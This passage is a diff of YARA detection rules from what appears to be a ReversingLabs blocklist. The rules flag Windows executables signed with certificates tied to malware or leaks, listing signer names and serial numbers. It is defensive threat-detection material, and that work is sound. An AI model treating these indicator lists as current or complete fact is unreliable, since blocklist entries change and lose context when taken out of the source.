1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Fdadd0740572270203F8138692C4A83 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4ce9b2ce-5dda-5741-bd29-cadae44c3b28" + id = "0b289c4e-c564-5513-a1a5-42e8551c6218" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7540-L7558" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a124f80d599051ecd7c17e6818d181ea018db14c9f0514bbcc5b677ba3656d65" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1600-L1616" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "18ce7ed721a454c5bb3cd6ab26df703b1e08b94b8c518055feffa38ad42afa50" score = 75 quality = 90 tags = "INFO, FILE" @@ -10912,22 +30703,22 @@ rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Fudl" and (pe.signatures[i].serial=="00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" or pe.signatures[i].serial=="d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af") and 1612828800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, William Zoltan" and pe.signatures[i].serial=="2f:da:dd:07:40:57:22:70:20:3f:81:38:69:2c:4a:83" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4Fc13D6220C629043A26F81B1Cad72D8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "36b12300-6535-5644-9145-9f532b49a421" + id = "c2573adc-6580-58aa-a58c-c21bf6b79364" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7560-L7578" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a672054a776d0715fc888578bcb559d24ef54b4c523f7d49a39ded2586c3140a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1618-L1634" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5572c278f6c9be62b2bba09ea610fd170438c6893ee5283ff4a5b3bb2852b07b" score = 75 quality = 90 tags = "INFO, FILE" @@ -10937,22 +30728,22 @@ rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADV TOURS d.o.o." and (pe.signatures[i].serial=="00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" or pe.signatures[i].serial=="d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82") and 1613001600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, meicun ge" and pe.signatures[i].serial=="4f:c1:3d:62:20:c6:29:04:3a:26:f8:1b:1c:ad:72:d8" and 1404172799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3457A918C6D3701B2Eaca6A92474A7Cc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "362a6eb7-f49e-502b-9870-522aea13e04b" + id = "12526715-7b54-5c31-aa2a-b77ed067e3ee" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7580-L7596" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8c98b856d53e6862e94042bb133f5739bddcec2e208e43961b23e244584c6ee4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1636-L1652" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "70d4bece52a86bfe8958f6d4195b833cea609596e3b68bb90087c262501bd462" score = 75 quality = 90 tags = "INFO, FILE" @@ -10962,22 +30753,22 @@ rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BBT KLA d.o.o." and pe.signatures[i].serial=="31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" and 1612396800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KONSALTING PLUS OOO" and pe.signatures[i].serial=="34:57:a9:18:c6:d3:70:1b:2e:ac:a6:a9:24:74:a7:cc" and 1432252799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_621Ed8265B0Ad872D9F4B4Ed6D560513 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0d0a58a4-353d-51f9-a739-a135d77357c9" + id = "b64e640c-264f-597c-90a5-d0ad57aa5075" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7598-L7614" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "55cc1634cdc5209d68b98fdb0d9e97e0a34346cdcb10f243d13217cda01195f1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1654-L1670" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c133d6eea5d27e597d0a656c7c930a5ca84adb46aa2fec66381b6b5c759e22aa" score = 75 quality = 90 tags = "INFO, FILE" @@ -10987,22 +30778,22 @@ rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PKV Trading ApS" and pe.signatures[i].serial=="17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" and 1613088000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fan Li" and pe.signatures[i].serial=="62:1e:d8:26:5b:0a:d8:72:d9:f4:b4:ed:6d:56:05:13" and 1413183357<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_56E22B992B4C7F1Afeac1D63B492Bf54 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "962c3096-2c3d-5137-9637-b45d00b2ee9b" + id = "28609e75-47cb-5017-bb92-046a9e8931c6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7616-L7632" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "793be308a4df55c3b325e1ee3185159c4155f6dfabc311216d3763bd43680bd4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1672-L1688" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ef058c0ec352260fa3db0fc74331d1da3c9eb8d161cef7635632fd7c569198c6" score = 75 quality = 90 tags = "INFO, FILE" @@ -11012,22 +30803,22 @@ rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Apladis" and pe.signatures[i].serial=="6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" and 1613001600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, Hetem Ramadani" and pe.signatures[i].serial=="56:e2:2b:99:2b:4c:7f:1a:fe:ac:1d:63:b4:92:bf:54" and 1435622399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Bc3Bae4118D46F3Fdd9Beeeab749Fee : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3f7f9d58-3a7a-5f84-bf6e-795a9c8bcd38" + id = "0d2f1f5f-119a-5069-abcb-e4e93d9964c3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7634-L7650" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "016ca6dcb5c7c56c80e4486b84d97fb3869a959ef3e8392e4376a0a0de06092f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1690-L1706" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fcbda27f8bf4dca8aa32103bb344380c82f0c701c25766df94c182ef94805a12" score = 75 quality = 90 tags = "INFO, FILE" @@ -11037,22 +30828,22 @@ rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Optima" and pe.signatures[i].serial=="03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" and 1606143708<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x9D\\x8E\\xE9\\x9B\\xAA\\xE6\\xA2\\x85" and pe.signatures[i].serial=="3b:c3:ba:e4:11:8d:46:f3:fd:d9:be:ee:ab:74:9f:ee" and 1442275199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0F0449F7691E5B4C8E74E71Cae822179 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "aaa31642-a0f4-5652-b3cd-c81cfb1ab127" + id = "17c99772-f2f9-56bc-be01-d9f62626a9ff" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7652-L7668" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "018e5a0fbeeaded2569b83e2f91230e0055a5ffa2059b7a064a5c2eda55ed2de" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1708-L1724" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f8d3593b357f27240a4399e877ae9044f783bb944ad47ec9fe8bbecc63be864c" score = 75 quality = 90 tags = "INFO, FILE" @@ -11062,22 +30853,22 @@ rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3N-\\xC5\\xA0PORT podjetje za in\\xC5\\xBEeniring, storitve in trgovino d.o.o." and pe.signatures[i].serial=="30:af:0d:0e:6d:82:01:a5:36:96:64:c5:eb:bb:01:0f" and 1613433600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SBO INVEST" and pe.signatures[i].serial=="0f:04:49:f7:69:1e:5b:4c:8e:74:e7:1c:ae:82:21:79" and 1432079999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_43Db4448D870D7Bdc275F36A01Fba36F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "82d6c0f5-80d1-5003-a5c9-9eadd9654460" + id = "47b3e681-87ae-5e70-8d02-18aa0daab0dc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7670-L7688" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2bc31eaa64be487cb85873a64b7462d90d1c28839def070ce5db7ae555383421" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1726-L1742" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "951e35e2c3f1bd90a33f8b76b6ede5686ee9b9c97a4c71df5b9dff15956209c5" score = 75 quality = 90 tags = "INFO, FILE" @@ -11087,22 +30878,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Tochka" and (pe.signatures[i].serial=="00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" or pe.signatures[i].serial=="ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81") and 1604620800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3-T TOV" and pe.signatures[i].serial=="43:db:44:48:d8:70:d7:bd:c2:75:f3:6a:01:fb:a3:6f" and 1436227199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2880A7F7Ff2D334Aa08744A8754Fab2C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0bf561ac-0283-557f-a685-4603e2b58273" + id = "b079b564-9284-59b6-9703-4e33f2b2c44d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7690-L7708" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8e0a11efc739baefe23a3d77e4eefc9dc23c74821c91fc219822dbc5dbb468b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1744-L1760" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "03c7e1251c44e8824ae3b648a95cf34f4c56db65d76806306a062a343981d87f" score = 75 quality = 90 tags = "INFO, FILE" @@ -11112,22 +30903,22 @@ rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTUNE STAR TRADING, INC." and (pe.signatures[i].serial=="00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" or pe.signatures[i].serial=="c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43") and 1604361600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Garena Online Pte Ltd" and pe.signatures[i].serial=="28:80:a7:f7:ff:2d:33:4a:a0:87:44:a8:75:4f:ab:2c" and 1393891199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0492F5C18E26Fa0Cd7E15067674Aff1C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e3ad8f20-d12f-54e9-a6da-7aad28a10287" + id = "6a176d4a-5d3e-5184-b923-12d561e7034a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7710-L7728" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b1d6f27fb513542589a5c9011e501a9d298282bba6882eac0fc7bf3e6ebb291" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1762-L1778" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d47d59d7680000d6c35181be2d9b034c2ecb7ca754a39c8e11750ddd7246b47c" score = 75 quality = 90 tags = "INFO, FILE" @@ -11137,22 +30928,22 @@ rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rada SP Z o o" and (pe.signatures[i].serial=="00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" or pe.signatures[i].serial=="92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b") and 1605139200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ghada Saffarini" and pe.signatures[i].serial=="04:92:f5:c1:8e:26:fa:0c:d7:e1:50:67:67:4a:ff:1c" and 1445990399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6Aa668Cd6A9De1Fdd476Ea8225326937 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1b8390aa-16b9-558b-aee8-e30fc7100af4" + id = "bfff2210-8545-594d-8674-243e57e3dd09" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7730-L7746" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4ae755e814ae2488d4bd6b8136ab6d78e4809a2ddacb7f88cf1d2b64c1488898" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1780-L1796" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "706e16995af40a6c9176dcbca07fb406f2efe4d47dbd9629d1a6b1ab1d09b045" score = 75 quality = 90 tags = "INFO, FILE" @@ -11162,22 +30953,22 @@ rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BAKERA s.r.o." and pe.signatures[i].serial=="45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" and 1607040000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BSCP LIMITED" and pe.signatures[i].serial=="6a:a6:68:cd:6a:9d:e1:fd:d4:76:ea:82:25:32:69:37" and 1441583999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Cb06Dccb482255728671Ea12Ac41620 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4f34fd37-908c-573c-ba53-5ab622589e88" + id = "5a7f61a4-15ba-5f5c-89e1-b8b986e13f19" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7748-L7764" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4b58c83901605d8b43519f1bc2d4ac8dc10c794f027681378b2bee2a8ff81604" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1798-L1814" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e0867ffe2ddd28282fe78b27b3b12ebac525b33a27dd242bc6f55bcd2e066a18" score = 75 quality = 90 tags = "INFO, FILE" @@ -11187,22 +30978,22 @@ rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Cifromatika LLC" and pe.signatures[i].serial=="56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" and 1606435200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fangzhen Li" and pe.signatures[i].serial=="1c:b0:6d:cc:b4:82:25:57:28:67:1e:a1:2a:c4:16:20" and 1445126399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_370C2467C41D6019Bbecd72E00C5D73D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "386c81ef-87aa-514e-81d7-dddfb90e0dc2" + id = "18c5d1bb-21b8-5157-a03b-8bcbdc74c0cd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7766-L7784" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "883545593b48aa11c11f7fa1a1f77c62321ea86067f1ed108dcd00c8c6cd3495" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1816-L1832" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b99522b75ee83d85b30146cb292b5a8a46dc300fb43dd9d39d9ca96c9d32d9b" score = 75 quality = 90 tags = "INFO, FILE" @@ -11212,22 +31003,22 @@ rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TGN Nedelica d.o.o." and (pe.signatures[i].serial=="00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" or pe.signatures[i].serial=="e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d") and 1604966400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UNINFO SISTEMAS LTDA ME" and pe.signatures[i].serial=="37:0c:24:67:c4:1d:60:19:bb:ec:d7:2e:00:c5:d7:3d" and 1445299199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5067339614C5Cc219C489D40420F3Bf9 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "c72b8b2a-3e49-5ac3-ab4d-55b86ce7f061" + id = "6e0cb6f9-0a92-5eb2-b13f-f9c4eb0ae6b1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L7786-L7804" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "03ac299459a1aaf2e4a2e62884cd321e16100fee78b4b0e271acdd8a4e32525c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L1834-L1850" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1716087285a093a3467583f79d7ae9bee641997227e6d4f95047905aedcc97c6" score = 75 quality = 90 tags = "INFO, FILE" @@ -11237,22 +31028,22 @@ rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Kolorit" and (pe.signatures[i].serial=="00:9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" or pe.signatures[i].serial=="9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24") and 1608076800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any 